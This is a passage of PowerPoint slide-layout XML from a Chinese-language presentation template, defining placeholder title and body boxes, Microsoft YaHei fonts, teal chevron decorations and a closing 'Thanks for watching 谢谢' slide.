          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="50AD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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1228716"/>
            <a:ext cx="6029340" cy="1343034"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642910" y="2857502"/>
            <a:ext cx="6072230" cy="1314450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>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dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版副标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1A9662C0-0480-4D82-9C23-11560885F3E9}"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FA704CE-91D2-425D-A05B-1F60547AE42B}"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1_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858148" y="571485"/>
            <a:ext cx="500066" cy="4023137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="竖排文字占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785786" y="571485"/>
            <a:ext cx="6929486" cy="4023137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1A9662C0-0480-4D82-9C23-11560885F3E9}"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FA704CE-91D2-425D-A05B-1F60547AE42B}"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1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A9662C0-0480-4D82-9C23-11560885F3E9}"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9FA704CE-91D2-425D-A05B-1F60547AE42B}"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cSld name="1_内容">
    <p:bg>
      <p:bgPr>
        <a:noFill/>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="任意多边形 1"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10478" y="2085499"/>
            <a:ext cx="6050280" cy="683895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 11662"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1814"/>
              <a:gd name="connsiteX1" fmla="*/ 11662 w 11662"/>
              <a:gd name="connsiteY1" fmla="*/ 1 h 1814"/>
              <a:gd name="connsiteX2" fmla="*/ 10751 w 11662"/>
              <a:gd name="connsiteY2" fmla="*/ 1814 h 1814"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 11662"/>
              <a:gd name="connsiteY3" fmla="*/ 1814 h 1814"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 11662"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 18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62" h="1814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11662" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10751" y="1814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="50ADCD"/>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3" name="日期占位符 2"/>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fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="685800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30724" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1430179" y="2140268"/>
            <a:ext cx="5616416" cy="530915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Thanks for watching     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50ADCD"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>谢谢</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="50ADCD"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355782" y="4495324"/>
            <a:ext cx="1621155" cy="271939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3134678" y="4471512"/>
            <a:ext cx="1671161" cy="346249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50ADCD"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>版权所有：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="50ADCD"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>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785786" y="214296"/>
            <a:ext cx="6072230" cy="500066"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="1"/>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785786" y="714362"/>
            <a:ext cx="7572428" cy="3929090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="656565"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1600"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1400"/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1A9662C0-0480-4D82-9C23-11560885F3E9}"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FA704CE-91D2-425D-A05B-1F60547AE42B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="285720" y="285734"/>
            <a:ext cx="519430" cy="362585"/>
            <a:chOff x="393700" y="392430"/>
            <a:chExt cx="519430" cy="362585"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="燕尾形 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="624840" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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燕尾形 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="393700" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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1_节标题">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4214824"/>
            <a:ext cx="7772400" cy="428628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="1" cap="all"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="785800"/>
            <a:ext cx="7772400" cy="3411156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="656565"/>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dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1A9662C0-0480-4D82-9C23-11560885F3E9}"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FA704CE-91D2-425D-A05B-1F60547AE42B}"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771556" y="205978"/>
            <a:ext cx="6086460" cy="508383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785786" y="714362"/>
            <a:ext cx="3690934" cy="3929090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buNone/>
              <a:defRPr sz="16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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="内容占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4643438" y="714362"/>
            <a:ext cx="3690934" cy="3929090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buNone/>
              <a:defRPr sz="16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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1A9662C0-0480-4D82-9C23-11560885F3E9}"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FA704CE-91D2-425D-A05B-1F60547AE42B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="285720" y="285734"/>
            <a:ext cx="519430" cy="362585"/>
            <a:chOff x="393700" y="392430"/>
            <a:chExt cx="519430" cy="362585"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="燕尾形 8"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="624840" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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燕尾形 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="393700" y="392430"/>
              <a:ext cx="288290" cy="362585"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="50AD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1_比较">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771556" y="205979"/>
            <a:ext cx="6157898" cy="508383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785786" y="714362"/>
            <a:ext cx="3714776" cy="479822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">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smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="内容占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785786" y="1285866"/>
            <a:ext cx="3714776" cy="3357586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1600"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1400"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1200"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1200"/>
            </a:lvl5pPr>
            <a:lvl6pPr>
              <a:defRPr sz="1600"/>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr sz="1600"/>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr sz="1600"/>
            </a:lvl8pPr>
            <a:lvl9pPr>
              <a:defRPr sz="1600"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4643438" y="714362"/>
            <a:ext cx="3714775" cy="479822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">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smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="内容占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4643438" y="1285866"/>
            <a:ext cx="3714775" cy="3357586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
